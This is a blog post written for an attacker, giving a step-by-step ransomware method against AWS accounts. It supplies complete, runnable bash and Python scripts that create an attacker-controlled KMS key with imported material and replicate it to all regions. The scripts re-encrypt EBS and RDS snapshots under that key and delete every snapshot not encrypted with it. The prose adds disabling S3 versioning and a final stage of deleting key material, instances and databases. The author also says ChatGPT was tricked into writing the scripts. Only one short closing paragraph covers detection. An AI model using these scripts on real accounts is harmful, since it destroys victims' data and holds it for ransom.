Effective Techniques for AWS Ransomware

In order to profit effectively from a ransomware attack, a threat actor needs to have something to offer in return for payment. This blog posts outlines a process, along with some python scripts to encrypt AWS resources and then revoke access to the secret material until the ransom is paid.

Typical ransomware attacks involving AWS have involved deleting data with a “promise to give it back” or outright extortion—we’ll release sensitive data on the dark web if you don’t pay us. Both are difficult for a threat actor to do at scale with large AWS Datasets. Downloading data means you need a storage location as big as the source.

But what if there was a way to conduct a more traditional encrypt-everything-and-hold-the-key ransom attack?

AWS provides an encryption service called KMS. One method that has not seen widespread adoption is to encrypt a victim’s data with a KMS key from an attacker or third-party compromised account. KMS keys are generally secure, and there are ways to make it difficult to decrypt the data. However, they rely on the core principles of IAM, and at the core of IAM is the root user. This user is as much a commercial and billing construct as it is a technical control. This means that if an attacker uses a KMS key from another account, I, as the victim, would have my attorney file an emergency order at a local court, demanding AWS turn over or reset the root credentials for the account that has the KMS key. At the end of the day, AWS is subject to the law1, and I can recover my data by leveraging the law.

There are two other methods that neither AWS nor the legal system can prevent. The first is to use an external key store (XKS), as outlined here. This is generally complex and can have some scaling issues. It’s also harder to explain to the victim (who, let’s face it, screwed up Shared Responsibility to the point you encrypted their data). As the attacker, you’d have to put the external infra back online, potentially opening you up to detection.

The Attack

The other method is to leverage external key material. This is the attack path I will document for you today. I’ll even include some simple bash scripts, courtesy of ChatGPT (who had no idea I was building ransomware scripts with my innocent queries).

Step 1 is to create an empty KMS key and upload a random 256-bit key. This is what you, as the threat actor, will provide your victim upon payment. Next, we replicate that key to every AWS region because we want to be able to encrypt as many things as possible during our dwell time in the victim’s account.

#!/bin/bash

# Ensure that AWS CLI and OpenSSL are installed
if ! command -v aws &> /dev/null; then
    echo "AWS CLI is not installed. Please install it before running this script."
    exit 1
fi

if ! command -v openssl &> /dev/null; then
    echo "OpenSSL is not installed. Please install it before running this script."
    exit 1
fi

# Step 1: Create a KMS key that supports imported key material
KEY_METADATA=$(aws kms create-key --origin EXTERNAL --description "$KEY_DESCRIPTION" --output json)
KEY_ID=$(echo $KEY_METADATA | jq -r '.KeyMetadata.KeyId')

if [ -z "$KEY_ID" ]; then
    echo "Failed to create KMS key."
    exit 1
fi

KEY_MATERIAL_FILE="$KEY_ID.key"

# Step 2: Generate the key material
openssl rand -out "$KEY_MATERIAL_FILE" 32
if [ $? -ne 0 ]; then
    echo "Failed to generate key material."
    exit 1
fi

# Step 3: Get the import parameters for the key
IMPORT_PARAMS=$(aws kms get-parameters-for-import --key-id "$KEY_ID" --wrapping-algorithm RSAES_OAEP_SHA_1 --wrapping-key-spec RSA_2048 --output json)
WRAPPING_KEY=$(echo $IMPORT_PARAMS | jq -r '.ImportToken')
PUBLIC_KEY_B64=$(echo $IMPORT_PARAMS | jq -r '.PublicKey')

# Decode the public key and save it to a file
echo "$PUBLIC_KEY_B64" | base64 -d > public_key.pem

# Step 4: Encrypt the key material
openssl rsautl -encrypt -oaep -inkey public_key.pem -pubin -in "$KEY_MATERIAL_FILE" -out encrypted_key_material.bin
if [ $? -ne 0 ]; then
    echo "Failed to encrypt key material."
    exit 1
fi

# Step 5: Import the key material to KMS
EXPIRATION_MODEL="KEY_MATERIAL_DOES_NOT_EXPIRE"
IMPORT_TOKEN=$(echo $IMPORT_PARAMS | jq -r '.ImportToken')
aws kms import-key-material --key-id "$KEY_ID" --encrypted-key-material fileb://encrypted_key_material.bin --import-token "$IMPORT_TOKEN" --expiration-model "$EXPIRATION_MODEL"

if [ $? -ne 0 ]; then
    echo "Failed to import key material to KMS."
    exit 1
fi

# Cleanup
echo "Cleaning up..."
rm -f public_key.pem encrypted_key_material.bin

# Summary
echo "Successfully created KMS key with imported key material."
echo "Key ID: $KEY_ID"

Is 256 bits enough? Apparently so…

Replicate Key to all regions script:

#!/bin/bash

# Ensure that AWS CLI and jq are installed
if ! command -v aws &> /dev/null; then
    echo "AWS CLI is not installed. Please install it before running this script."
    exit 1
fi

if ! command -v jq &> /dev/null; then
    echo "jq is not installed. Please install it before running this script."
    exit 1
fi

# Check if a key ID was provided
if [ -z "$1" ]; then
    echo "Usage: $0 <key-id>"
    exit 1
fi

# Set variables
KEY_ID=$1

# Step 1: Get a list of all enabled regions
REGIONS=$(aws ec2 describe-regions --query "Regions[?OptInStatus!='not-opted-in'].RegionName" --output text)

# Step 2: Replicate the KMS key into each enabled region and import key material
for REGION in $REGIONS; do
    # Get the import parameters for the key in the target region
    IMPORT_PARAMS=$(aws kms get-parameters-for-import --key-id "$KEY_ID" --wrapping-algorithm RSAES_OAEP_SHA_1 --wrapping-key-spec RSA_4096 --region "$REGION" --output json)
    PUBLIC_KEY_B64=$(echo $IMPORT_PARAMS | jq -r '.PublicKey')
    IMPORT_TOKEN=$(echo $IMPORT_PARAMS | jq -r '.ImportToken')

    # Save the public key for the region
    echo "$PUBLIC_KEY_B64" | base64 -d > "${KEY_ID}-${REGION}.pem"

    # Encrypt the key material
    openssl rsautl -encrypt -oaep -inkey "${KEY_ID}-${REGION}.pem" -pubin -in "$KEY_ID.key" -out "${KEY_ID}-${REGION}.bin"

    # Import the key material into the region
    aws kms import-key-material --key-id "$KEY_ID" --region "$REGION" --encrypted-key-material fileb://"${KEY_ID}-${REGION}.bin" --import-token "$IMPORT_TOKEN" --expiration-model KEY_MATERIAL_DOES_NOT_EXPIRE
    echo "Replicating KMS key to region: $REGION"
    aws kms replicate-key --key-id "$KEY_ID" --replica-region "$REGION" --output json
    if [ $? -ne 0 ]; then
        echo "Failed to replicate KMS key to region: $REGION"
    else
        echo "Successfully replicated and imported key material for KMS key to region: $REGION"
    fi
done

# Summary
echo "KMS key replication process completed."

Step 2 is to start doing the encryption. There are several ways resources get encrypted in AWS, but EBS Volumes are a big one. AWS supports EBS default encryption, which we will now set using our ransom KMS key. Once this is done, all new volumes and snapshots are encrypted with the attacker-provided key material. You can do the same for any RDS Snapshots. Copy the snapshot and use the new ransom key. Make sure to delete the old snapshot or wait till the Rug Pull phase.

Enable Default EBS Encryption (in all regions)

#!/bin/bash

# Ensure that AWS CLI and jq are installed
if ! command -v aws &> /dev/null; then
    echo "AWS CLI is not installed. Please install it before running this script."
    exit 1
fi

if ! command -v jq &> /dev/null; then
    echo "jq is not installed. Please install it before running this script."
    exit 1
fi

# Check if a key ID was provided
if [ -z "$1" ]; then
    echo "Usage: $0 <multi-region-key-id>"
    exit 1
fi

# Set variables
KEY_ID=$1

# Step 1: Get a list of all enabled regions
REGIONS=$(aws ec2 describe-regions --query "Regions[?OptInStatus!='not-opted-in'].RegionName" --output text)

# Step 2: Enable EBS default encryption using the specified key in each enabled region
for REGION in $REGIONS; do
    echo "Enabling EBS default encryption in region: $REGION with key ID: $KEY_ID"
    aws ec2 enable-ebs-encryption-by-default --region "$REGION"
    if [ $? -ne 0 ]; then
        echo "Failed to enable EBS encryption by default in region: $REGION"
    else
        aws ec2 modify-ebs-default-kms-key-id --region "$REGION" --kms-key-id "$KEY_ID"
        if [ $? -ne 0 ]; then
            echo "Failed to set KMS key for EBS default encryption in region: $REGION"
        else
            echo "Successfully enabled EBS default encryption in region: $REGION with key ID: $KEY_ID"
        fi
    fi
done

# Summary
echo "EBS default encryption setup process completed."

Python script to copy and encrypt EBS Snapshots

#!/usr/bin/env python3

import boto3
import threading
import sys
import time
from concurrent.futures import ThreadPoolExecutor, as_completed

# Ensure that AWS CLI and boto3 are installed
def check_dependencies():
    try:
        import boto3
    except ImportError:
        print("boto3 is not installed. Please install it before running this script.")
        sys.exit(1)

check_dependencies()

# Check if a key ID was provided
if len(sys.argv) < 2:
    print("Usage: {} <multi-region-key-id>".format(sys.argv[0]))
    sys.exit(1)

# Set variables
KEY_ID = sys.argv[1]

ec2_clients = {}
def get_ec2_client(region):
    if region not in ec2_clients:
        ec2_clients[region] = boto3.client('ec2', region_name=region)
    return ec2_clients[region]

# Step 1: Get a list of all enabled regions
session = boto3.session.Session()
regions = [region['RegionName'] for region in session.client('ec2').describe_regions(Filters=[{'Name': 'opt-in-status', 'Values': ['opt-in-not-required', 'opted-in']}])['Regions']]

# Step 2: Function to create snapshot and encrypt it
def process_volume(region, volume_id):
    ec2 = get_ec2_client(region)
    try:
        # Create a snapshot of the volume
        print(f"Creating snapshot for volume: {volume_id} in region: {region}")
        snapshot = ec2.create_snapshot(VolumeId=volume_id, Description=f"Snapshot of {volume_id} encrypted with KMS key {KEY_ID}")
        snapshot_id = snapshot['SnapshotId']

        # Wait for the snapshot to complete
        print(f"Waiting for snapshot {snapshot_id} to complete in region: {region}")
        waiter = ec2.get_waiter('snapshot_completed')
        waiter.wait(SnapshotIds=[snapshot_id])

        # Copy the snapshot to encrypt it with the specified KMS key
        print(f"Encrypting snapshot: {snapshot_id} with KMS key: {KEY_ID} in region: {region}")
        encrypted_snapshot = ec2.copy_snapshot(
            SourceRegion=region,
            SourceSnapshotId=snapshot_id,
            Description=f"Encrypted copy of {volume_id}",
            Encrypted=True,
            KmsKeyId=KEY_ID
        )
        encrypted_snapshot_id = encrypted_snapshot['SnapshotId']

        # Wait for the encrypted snapshot to complete
        print(f"Waiting for encrypted snapshot {encrypted_snapshot_id} to complete in region: {region}")
        waiter.wait(SnapshotIds=[encrypted_snapshot_id])

        # Optionally delete the unencrypted snapshot
        print(f"Deleting unencrypted snapshot: {snapshot_id} in region: {region}")
        ec2.delete_snapshot(SnapshotId=snapshot_id)

        print(f"Successfully created and encrypted snapshot for volume: {volume_id} in region: {region}")
    except Exception as e:
        print(f"Failed to process volume {volume_id} in region {region}: {str(e)}")

# Step 3: Iterate over each region and create snapshots of the EBS volumes using threads
def process_region(region):
    ec2 = get_ec2_client(region)
    volumes = ec2.describe_volumes()['Volumes']
    if not volumes:
        print(f"No EBS volumes found in region: {region}")
        return

    futures = []
    with ThreadPoolExecutor(max_workers=5) as executor:
        for volume in volumes:
            volume_id = volume['VolumeId']
            futures.append(executor.submit(process_volume, region, volume_id))

        for future in as_completed(futures):
            try:
                future.result()
            except Exception as e:
                print(f"Error occurred: {str(e)}")

# Step 4: Use threads to process each region
threads = []
for region in regions:
    thread = threading.Thread(target=process_region, args=(region,))
    threads.append(thread)
    thread.start()

for thread in threads:
    thread.join()

# Summary
print("EBS volume snapshot and encryption process completed.")

RDS Database encryption

#!/usr/bin/env python3

import boto3
import threading
import sys
from concurrent.futures import ThreadPoolExecutor, as_completed

# Ensure that AWS CLI and boto3 are installed
def check_dependencies():
    try:
        import boto3
    except ImportError:
        print("boto3 is not installed. Please install it before running this script.")
        sys.exit(1)

check_dependencies()

# Check if a key ID was provided
if len(sys.argv) < 2:
    print("Usage: {} <multi-region-key-id>".format(sys.argv[0]))
    sys.exit(1)

# Set variables
KEY_ID = sys.argv[1]

rds_clients = {}
def get_rds_client(region):
    if region not in rds_clients:
        rds_clients[region] = boto3.client('rds', region_name=region)
    return rds_clients[region]

# Step 1: Get a list of all enabled regions
session = boto3.session.Session()
regions = [region['RegionName'] for region in session.client('ec2').describe_regions(Filters=[{'Name': 'opt-in-status', 'Values': ['opt-in-not-required', 'opted-in']}])['Regions']]

# Step 2: Function to take a snapshot of an RDS database and encrypt it
def create_encrypted_snapshot(region, db_instance_identifier):
    rds = get_rds_client(region)
    try:
        # Create a manual snapshot of the RDS instance
        snapshot_identifier = f"{db_instance_identifier}-snapshot"
        print(f"Creating snapshot for RDS instance: {db_instance_identifier} in region: {region}")
        snapshot = rds.create_db_snapshot(
            DBInstanceIdentifier=db_instance_identifier,
            DBSnapshotIdentifier=snapshot_identifier
        )
        snapshot_arn = snapshot['DBSnapshot']['DBSnapshotArn']

        # Wait for the snapshot to be available
        print(f"Waiting for snapshot {snapshot_identifier} to be available in region: {region}")
        waiter = rds.get_waiter('db_snapshot_completed')
        waiter.wait(DBSnapshotIdentifier=snapshot_identifier)

        # Copy the snapshot to encrypt it with the specified KMS key
        encrypted_snapshot_identifier = f"{db_instance_identifier}-encrypted-snapshot"
        print(f"Encrypting snapshot: {snapshot_identifier} with KMS key: {KEY_ID} in region: {region}")
        rds.copy_db_snapshot(
            SourceDBSnapshotIdentifier=snapshot_arn,
            TargetDBSnapshotIdentifier=encrypted_snapshot_identifier,
            KmsKeyId=KEY_ID,
            CopyTags=True,
            Tags=[
                {
                    'Key': 'source-database',
                    'Value': db_instance_identifier
                }
            ]
        )

        # Wait for the encrypted snapshot to be available
        print(f"Waiting for encrypted snapshot {encrypted_snapshot_identifier} to be available in region: {region}")
        waiter.wait(DBSnapshotIdentifier=encrypted_snapshot_identifier)

        # Optionally delete the unencrypted snapshot
        print(f"Deleting unencrypted snapshot: {snapshot_identifier} in region: {region}")
        rds.delete_db_snapshot(DBSnapshotIdentifier=snapshot_identifier)

        print(f"Successfully created and encrypted snapshot for RDS instance: {db_instance_identifier} in region: {region}")
    except Exception as e:
        print(f"Failed to process RDS instance {db_instance_identifier} in region {region}: {str(e)}")

# Step 3: Iterate over each region and create snapshots of the RDS databases using threads
def process_region(region):
    rds = get_rds_client(region)
    dbs = rds.describe_db_instances()['DBInstances']
    if not dbs:
        print(f"No RDS instances found in region: {region}")
        return

    futures = []
    with ThreadPoolExecutor(max_workers=5) as executor:
        for db in dbs:
            db_instance_identifier = db['DBInstanceIdentifier']
            futures.append(executor.submit(create_encrypted_snapshot, region, db_instance_identifier))

        for future in as_completed(futures):
            try:
                future.result()
            except Exception as e:
                print(f"Error occurred: {str(e)}")

# Step 4: Use threads to process each region
threads = []
for region in regions:
    thread = threading.Thread(target=process_region, args=(region,))
    threads.append(thread)
    thread.start()

for thread in threads:
    thread.join()

# Summary
print("RDS snapshot creation and encryption process completed.")

Step 3 will take longer since it involves S3. You can create an AWS Batch job to re-encrypt all objects using a new key. There are a few considerations to be aware of. First, if the victim has object versioning enabled, they can recover their objects by restoring the previous version over yours. So you probably want to turn versioning off. Luckily for you (the attacker), the IAM action to enable and disable versioning is the same, so there is no way a defender can define a security invariant of “don’t let my users disable versioning” unless they also prevent their users from enabling versioning.

The final step is the Rug Pull. Delete the custom KMS key material, terminate all the running instances, delete any stray volumes, and delete the RDS databases. Your victim will have their data and will be able to recover, but only after they pay you for the 256 bits that only you now possess.

Delete all the snapshots that aren’t encrypted by the ransom KMS key

#!/usr/bin/env python3

import boto3
import threading
import sys
from concurrent.futures import ThreadPoolExecutor, as_completed

# Ensure that AWS CLI and boto3 are installed
def check_dependencies():
    try:
        import boto3
    except ImportError:
        print("boto3 is not installed. Please install it before running this script.")
        sys.exit(1)

check_dependencies()

# Check if a key ID was provided
if len(sys.argv) < 2:
    print("Usage: {} <multi-region-key-id>".format(sys.argv[0]))
    sys.exit(1)

# Set variables
KEY_ID = sys.argv[1]

ec2_clients = {}
def get_ec2_client(region):
    if region not in ec2_clients:
        ec2_clients[region] = boto3.client('ec2', region_name=region)
    return ec2_clients[region]

# Step 1: Get a list of all enabled regions
session = boto3.session.Session()
regions = [region['RegionName'] for region in session.client('ec2').describe_regions(Filters=[{'Name': 'opt-in-status', 'Values': ['opt-in-not-required', 'opted-in']}])['Regions']]

# Step 2: Function to delete unencrypted snapshots
def delete_unencrypted_snapshot(region, snapshot_id):
    ec2 = get_ec2_client(region)
    try:
        print(f"Deleting snapshot: {snapshot_id} in region: {region}")
        ec2.delete_snapshot(SnapshotId=snapshot_id)
        print(f"Successfully deleted snapshot: {snapshot_id} in region: {region}")
    except Exception as e:
        print(f"Failed to delete snapshot {snapshot_id} in region {region}: {str(e)}")

# Step 3: Iterate over each region and find unencrypted snapshots
def process_region(region):
    ec2 = get_ec2_client(region)
    snapshots = ec2.describe_snapshots(OwnerIds=['self'])['Snapshots']
    if not snapshots:
        print(f"No snapshots found in region: {region}")
        return

    futures = []
    with ThreadPoolExecutor(max_workers=5) as executor:
        for snapshot in snapshots:
            snapshot_id = snapshot['SnapshotId']
            kms_key_id = snapshot.get('KmsKeyId')

            # Check if the snapshot is encrypted with the specified multi-region key
            if not kms_key_id or not kms_key_id.endswith(KEY_ID):
                print(f"Deleting snapshot {snapshot_id} encrypted with key {kms_key_id}")
                futures.append(executor.submit(delete_unencrypted_snapshot, region, snapshot_id))

        for future in as_completed(futures):
            try:
                future.result()
            except Exception as e:
                print(f"Error occurred: {str(e)}")

# Step 4: Use threads to process each region
threads = []
for region in regions:
    thread = threading.Thread(target=process_region, args=(region,))
    threads.append(thread)
    thread.start()

for thread in threads:
    thread.join()

# Summary
print("Unencrypted snapshot deletion process completed.")

Recovery for the victim is straightforward. They take the base64-encoded 256-bit secret, re-upload it to the KMS key, and their data is accessible again. If they’re absolutely panicked, the AWS CERT is a free resource that can help them recover. But… be wary; that team is probably also looking for you.

Can you prevent this?

Yes, uploading KMS Key material is its own AWS, which call you can theoretically block via an SCP. There are a number of CloudTrail events that are generated when this activity occurs. You can create detections around those eventName/eventSource pairs.

I was going to gather all that data from the CloudTrail and my test account, but… I don’t feel like doing that anymore. So here’s my raw research.


  1. Now that the law is about to be controlled by a hypersensitive narcissist with immunity for all “official” actions, you should be seriously reevaluating your threat model of being in the cloud. Just ask CNN about that. ↩︎